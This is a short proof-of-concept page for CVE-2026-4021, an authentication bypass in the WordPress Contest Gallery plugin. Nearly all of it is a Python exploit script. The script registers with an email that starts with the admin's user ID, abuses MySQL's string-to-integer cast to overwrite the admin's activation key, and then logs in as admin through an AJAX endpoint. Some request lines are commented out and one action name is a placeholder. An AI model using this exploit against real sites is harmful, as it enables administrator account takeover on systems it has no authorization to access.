CVE-2026-4021 WordPress Contest Gallery认证绕过漏洞

import requests target_url = "http://target-wordpress-site.com" admin_id = 1 # Crafted email starting with target Admin ID crafted_email = f"{admin_id}[email protected]" # Step 1: Register with crafted email (RegMailOptional=1 required) register_payload = { "action": "cg_registration_action", # Placeholder for specific plugin action "email": crafted_email } # r = requests.post(f"{target_url}/wp-admin/admin-ajax.php", data=register_payload) # Step 2: Trigger confirmation flow # This causes SQL: UPDATE ... SET user_activation_key = ... WHERE ID = '[email protected]' # MySQL converts '[email protected]' to integer 1, overwriting Admin's key. # Step 3: Authenticate as Admin using the AJAX endpoint login_payload = { "action": "post_cg1l_login_user_by_key", "key": "GENERATED_KEY_FROM_STEP_1" } # r = requests.post(f"{target_url}/wp-admin/admin-ajax.php", data=login_payload) print(f"Attempted takeover of Admin ID {admin_id} using email {crafted_email}")